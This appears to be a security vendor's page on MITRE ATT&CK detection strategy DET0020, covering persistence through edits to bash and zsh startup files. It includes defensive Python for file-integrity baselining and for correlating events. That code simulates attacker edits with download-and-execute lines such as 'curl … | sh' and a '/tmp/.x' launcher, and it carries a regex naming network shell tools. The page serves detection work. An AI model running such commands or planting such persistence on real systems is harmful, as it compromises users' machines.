MITRE ATT&CK® Detection Strategy

DET0020: Detect Shell Configuration Modification for Persistence via Event-Triggered Execution

Domain: Enterprise | ID: DET0020 | Type: Detection Strategy | Object version: 1.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

This detection strategy is about finding persistence created by modifying Unix shell configuration so commands run automatically when a user starts or logs into a shell. For leaders, the risk is that a one-line addition to a startup file persists across reboots and sessions, re-executes silently every time the affected user or administrator opens a shell, and can support privilege escalation (when the file belongs to a privileged account) or long-term access on Linux and macOS systems.

Executive priority

Prioritize this where Linux or macOS systems support critical administration, development, cloud operations, or regulated workloads. Ask whether the organization can prove who changed shell configuration files, when the change occurred, and what command executed afterward. This is useful for incident response scoping, audit evidence around privileged access, and deciding whether endpoint logging and file integrity monitoring are adequate for Unix-like environments.

Technical view

The supplied ATT&CK relationship maps this strategy to T1546.004, Unix Shell Configuration Modification, under persistence and privilege escalation for Linux and macOS. SOC and detection teams should validate monitoring for changes to system-level shell configuration under /etc (for example /etc/profile, the scripts in /etc/profile.d/, /etc/bash.bashrc or /etc/bashrc, and /etc/zshenv, /etc/zprofile, /etc/zshrc, /etc/zlogin) and to user-level startup files in home directories (~/.bash_profile, ~/.bash_login, ~/.profile, ~/.bashrc, ~/.bash_logout, and the zsh equivalents ~/.zshenv, ~/.zprofile, ~/.zshrc, ~/.zlogin, ~/.zlogout), then correlate those changes with shell launches, SSH logins, user sessions, and unexpected child processes. Which file actually runs depends on the shell and on the kind of session: bash reads the profile files only for login shells and ~/.bashrc for interactive non-login shells (and for commands run over SSH without a terminal), while zsh, the default shell on current macOS, reads ~/.zshenv for every invocation and ~/.zprofile plus ~/.zshrc for each new Terminal tab, which opens a login shell. A detection that watches only ~/.bash_profile therefore misses a Mac fleet, and one that ignores ~/.zshenv misses the file that fires even for non-interactive commands. Because MITRE did not provide official detection logic for this object, local baselining and environment-specific allowlisting are required.
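The following script, added here as an example and not MITRE's or Glexia's code, shows the baseline-and-diff check the technical view calls for: it inventories the bash and zsh startup files under /etc and in each home directory, records a hash, owner and mode for every candidate (including files that do not yet exist, so a newly dropped ~/.zshenv is reported as created), and reports hash, mode and ownership changes. The file lists follow the bash and zsh startup sequence; build_demo_root() and the fake filesystem it creates in a temp directory are constructed so the script runs offline, and the "foreign owner" check (a file inside a user's home owned by a different uid) is an assumption about what normal looks like.

```python
"""Baseline-and-diff check for Unix shell startup files.

Added example for this page, not MITRE's or Glexia's code. The file lists
follow the bash and zsh startup sequence. build_demo_root() and the fake
filesystem it creates in a temp directory are constructed so the script runs
offline; to run it on a host, call snapshot(Path("/"), [Path(h) for h in
real_home_dirs]) and store the result as the baseline.
"""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# System-wide files read by bash and zsh for login/interactive shells.
SYSTEM_FILES = ["etc/profile", "etc/bash.bashrc", "etc/bashrc", "etc/zshenv",
                "etc/zprofile", "etc/zshrc", "etc/zlogin", "etc/zlogout"]
SYSTEM_DIRS = ["etc/profile.d"]   # every file in here is sourced by /etc/profile
# Per-user startup files; which one runs depends on shell and session type.
USER_FILES = [".bash_profile", ".bash_login", ".profile", ".bashrc", ".bash_logout",
              ".zshenv", ".zprofile", ".zshrc", ".zlogin", ".zlogout"]


def candidate_paths(root, homes):
    """Every path that could carry startup persistence, present or not."""
    paths = [root / rel for rel in SYSTEM_FILES]
    for rel in SYSTEM_DIRS:
        d = root / rel
        if d.is_dir():
            paths.extend(sorted(p for p in d.iterdir() if p.is_file()))
    for home in homes:
        paths.extend(home / rel for rel in USER_FILES)
    return paths


def snapshot(root, homes):
    """Map each candidate path to {sha256, uid, mode}, or None if it is absent."""
    snap = {}
    for p in candidate_paths(root, homes):
        if p.is_file():
            st = p.stat()
            snap[str(p)] = {"sha256": hashlib.sha256(p.read_bytes()).hexdigest(),
                            "uid": st.st_uid, "mode": stat.S_IMODE(st.st_mode)}
        else:
            snap[str(p)] = None
    return snap


def diff(baseline, current, homes):
    """Findings as (kind, path): created/deleted/modified/mode_changed, plus
    files writable by group or others and user files not owned by the home's owner."""
    findings = []
    home_owner = {str(h): h.stat().st_uid for h in homes}
    for path in sorted(set(baseline) | set(current)):
        before, after = baseline.get(path), current.get(path)
        if before is None and after is not None:
            findings.append(("created", path))
        elif before is not None and after is None:
            findings.append(("deleted", path))
        elif before and after and before["sha256"] != after["sha256"]:
            findings.append(("modified", path))
        elif before and after and before["mode"] != after["mode"]:
            findings.append(("mode_changed", path))
        if after and after["mode"] & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(("writable_by_others", path))
        for home, uid in home_owner.items():
            if after and path.startswith(home + os.sep) and after["uid"] != uid:
                findings.append(("foreign_owner", path))
    return findings


def _write(path, text, mode=0o644):
    """Write a file with an explicit mode so the demo does not depend on umask."""
    path.write_text(text)
    os.chmod(path, mode)


def build_demo_root():
    """Constructed fake filesystem so the example runs offline (assumption)."""
    root = Path(tempfile.mkdtemp())
    (root / "etc/profile.d").mkdir(parents=True)
    _write(root / "etc/profile", "umask 022\n")
    _write(root / "etc/profile.d/lang.sh", "export LANG=C.UTF-8\n")
    home = root / "home/alice"
    home.mkdir(parents=True)
    _write(home / ".bashrc", "alias ll='ls -l'\n")
    return root, [home]


def run_demo():
    """Take a baseline, simulate three attacker edits, and return the findings."""
    root, homes = build_demo_root()
    baseline = snapshot(root, homes)
    # Constructed attacker activity: append a command to .bashrc, drop a new
    # zsh startup file, and make /etc/profile writable by everyone.
    with open(homes[0] / ".bashrc", "a") as f:
        f.write("curl -s http://example.invalid/s | sh\n")
    _write(homes[0] / ".zshenv", "/tmp/.x &\n")
    os.chmod(root / "etc/profile", 0o666)
    return diff(baseline, snapshot(root, homes), homes)


if __name__ == "__main__":
    for kind, path in run_demo():
        print(f"{kind:20}{path}")
```

Recording absent files in the baseline is the point: an attacker who cannot edit ~/.bashrc without tripping a hash check can still create ~/.zshenv or a new script in /etc/profile.d/, and a FIM policy built only from files that exist today will not see it. On a real host, store the baseline off-box and compare it from a scheduled job or your EDR's file-integrity module rather than from the monitored host alone.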

Likely telemetry

  • File creation, modification, ownership, permission, and timestamp events for Unix shell configuration files in /etc and user home directories
  • Endpoint process execution telemetry for shells and child processes launched during login or interactive sessions
  • Authentication and session logs, including SSH login activity where available
  • File integrity monitoring or audit framework events on Linux and macOS endpoints
  • User, host, and privilege context for accounts modifying shell startup configuration

Detection direction

  • Validate that monitoring covers both system-wide and per-user shell configuration locations; focusing only on /etc can miss user-level persistence.
  • Correlate shell configuration changes with subsequent shell or SSH session starts and unusual commands spawned from those sessions.
  • Tune for legitimate administrator, developer, and configuration-management activity to reduce false positives while preserving evidence of who made the change.
  • Review high-risk patterns such as changes made by unexpected users, changes near authentication events, or modifications on systems that normally have stable shell profiles.
  • Use the relationship to T1546.004 as detection context, but do not assume coverage from this ATT&CK object alone because no official detection analytic was supplied.
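The following script, added as an example and not MITRE's or Glexia's detection logic, runs the correlation described in the list above over a handful of constructed events: it keeps an evidence record of every startup-file change (so approved configuration-management writes stay auditable), suppresses alerts for allowlisted root tooling, flags a writer who does not own the file or root writing into a user's home, notes a login by the writer shortly before the change, and raises severity when a session for the affected account follows and its shell spawns a suspicious child. The event schema (assumed to be already normalized from auditd, EDR and auth logs), the allowlist, the 10-minute and 24-hour windows and the sample events are all assumptions to adapt to your own pipeline.

```python
"""Correlate shell-startup-file changes with the sessions that follow them.

Added example for this page, not MITRE's or Glexia's detection logic. The
event schema (already normalized from auditd/EDR/auth logs), the allowlist,
the time windows and the sample events are constructed assumptions; map the
field names onto your own pipeline before use.
"""
import re
from datetime import datetime, timedelta

USER_RE = re.compile(r"^/(?:home|Users)/([^/]+)/\.(?:bash_profile|bash_login|profile|bashrc|"
                     r"bash_logout|zshenv|zprofile|zshrc|zlogin|zlogout)$")
SYSTEM_RE = re.compile(r"^/etc/(?:profile|profile\.d/[^/]+|bash\.bashrc|bashrc|zshenv|"
                       r"zprofile|zshrc|zlogin|zlogout)$")
# Tools allowed to rewrite startup files as root (assumption: tune per site).
ALLOWED_WRITERS = {"ansible-playbook", "puppet", "chef-client", "dpkg", "rpm", "useradd"}
SUSPICIOUS_CMD = re.compile(r"curl|wget|\bnc\b|ncat|base64 -d|/tmp/|/dev/tcp|bash -i")
BEFORE = timedelta(minutes=10)   # a login by the writer shortly before the change
AFTER = timedelta(hours=24)      # sessions and child processes after the change


def owner_of(path):
    """'root' for system files, the user name for home-directory files, else None."""
    m = USER_RE.match(path)
    if m:
        return m.group(1)
    return "root" if SYSTEM_RE.match(path) else None


def analyze(events):
    """Return (evidence, alerts). Evidence keeps every change to a startup file,
    allowlisted or not; alerts carry only the changes that need a human."""
    ev = sorted(events, key=lambda e: e["ts"])
    evidence, alerts = [], []
    for i, e in enumerate(ev):
        if e["type"] != "file_write" or (owner := owner_of(e["path"])) is None:
            continue
        evidence.append({k: e[k] for k in ("ts", "host", "path", "user", "writer")})
        if e["user"] == "root" and e["writer"] in ALLOWED_WRITERS:
            continue  # approved configuration management; evidence retained above
        reasons = []
        if e["user"] not in (owner, "root"):
            reasons.append(f"written by {e['user']} but belongs to {owner}")
        if e["user"] == "root" and owner != "root":
            reasons.append("root wrote into a user's startup file")
        # Authentication shortly before the change (same host, same account).
        if any(f["type"] == "session_start" and f["host"] == e["host"]
               and f["user"] == e["user"] and timedelta(0) <= e["ts"] - f["ts"] <= BEFORE
               for f in ev[:i]):
            reasons.append("change followed a login by the writer within 10 minutes")
        # Sessions for the affected account(s) and what their shells spawn afterwards.
        sessions, spawned = 0, []
        for f in ev[i + 1:]:
            if f["ts"] - e["ts"] > AFTER:
                break
            if f["host"] != e["host"] or (owner != "root" and f["user"] != owner):
                continue   # files under /etc affect every account on the host
            if f["type"] == "session_start":
                sessions += 1
            elif (f["type"] == "process" and f["parent"] in ("bash", "zsh", "sh")
                  and SUSPICIOUS_CMD.search(f["cmd"])):
                spawned.append(f["cmd"])
        if sessions:
            reasons.append(f"{sessions} session(s) started afterwards")
        if spawned:
            reasons.append("shell spawned: " + "; ".join(spawned))
        severity = "high" if spawned else "medium" if reasons else "low"
        alerts.append({"path": e["path"], "user": e["user"], "host": e["host"],
                       "severity": severity, "reasons": reasons})
    return evidence, alerts


def sample_events():
    """Constructed events for one host (assumption, not real telemetry)."""
    t = lambda h, m: datetime(2025, 1, 6, h, m)
    return [
        {"ts": t(9, 0), "type": "session_start", "host": "web1", "user": "alice", "src": "203.0.113.9"},
        {"ts": t(9, 1), "type": "file_write", "host": "web1", "user": "alice", "writer": "bash",
         "path": "/home/alice/.bashrc"},
        {"ts": t(9, 5), "type": "session_start", "host": "web1", "user": "alice", "src": "203.0.113.9"},
        {"ts": t(9, 5), "type": "process", "host": "web1", "user": "alice", "parent": "bash",
         "cmd": "curl -s http://198.51.100.7/a.sh | sh"},
        {"ts": t(10, 0), "type": "file_write", "host": "web1", "user": "root",
         "writer": "ansible-playbook", "path": "/etc/profile.d/lang.sh"},
        {"ts": t(11, 0), "type": "file_write", "host": "web1", "user": "root", "writer": "bash",
         "path": "/home/bob/.zshrc"},
        {"ts": t(11, 30), "type": "session_start", "host": "web1", "user": "bob", "src": "10.0.0.8"},
        {"ts": t(11, 31), "type": "process", "host": "web1", "user": "bob", "parent": "zsh",
         "cmd": "ls -la"},
        {"ts": t(12, 0), "type": "file_write", "host": "web1", "user": "carol", "writer": "vim",
         "path": "/home/carol/notes.txt"},
    ]


if __name__ == "__main__":
    evidence, alerts = analyze(sample_events())
    print(f"{len(evidence)} startup-file changes recorded")
    for a in alerts:
        print(a["severity"].upper(), a["path"], "by", a["user"], "|", "; ".join(a["reasons"]))
```

On the sample data the Ansible write to /etc/profile.d/ is recorded but not alerted, alice's edit of her own .bashrc is escalated to high only because the next session's shell spawned a download-and-execute command, and root's write into bob's .zshrc is medium even though bob's later session looked benign. Treat the allowlist as evidence-preserving suppression, not as a filter at ingest: the audit question in the executive section (who changed the file, when, and what ran next) is only answerable if the suppressed writes are still stored.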

Mitigation priorities

  • Establish baseline and change control for shell configuration on Linux and macOS systems that support critical operations.
  • Restrict write access to system-level shell configuration and apply least privilege for administrative accounts.
  • Use file integrity monitoring or endpoint audit controls for sensitive shell startup locations.
  • Ensure incident response procedures include review of shell startup files during persistence and privilege-escalation investigations.
  • Maintain compliance evidence showing configuration ownership, approved changes, and monitoring coverage for privileged Unix-like systems.

Analyst notes and limits

This object is a MITRE ATT&CK detection strategy, DET0020, and its meaningful context comes primarily from its relationship to T1546.004. The business value is in validating whether endpoint and identity telemetry can connect a configuration-file change to later event-triggered execution during shell use.

The official object provides no description, no detection text, no tactics, and no platforms directly on the detection strategy. Platform and tactic context are derived from the supplied relationship to T1546.004 only. Local file paths, shell types, normal administrator behavior, and logging capabilities must be confirmed in the environment before operationalizing detections.

Official MITRE ATT&CK definition

Detect Shell Configuration Modification for Persistence via Event-Triggered Execution

No official description is available in the imported ATT&CK source object.

The same entry is available on attack.mitre.org (MITRE-hosted reference).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related techniques, data sources, and mitigations against the official ATT&CK relationships and your own telemetry before making control-coverage decisions; for this object, the only supplied relationship is the one to T1546.004.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

1 row
Domain     | ID        | Name                                                  | Relationship / procedure
Enterprise | T1546.004 | Unix Shell Configuration Modification (sub-technique) | This object detects Unix Shell Configuration Modification.
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 568282251633e21a...
Imported snapshots across ATT&CK releases (1)
Release | Bundle imported | Object version | Modified | Status         | Raw hash
19.1    |                 | 1.0            |          | Current bundle | 568282251633…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack DET0020 (source URL)

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.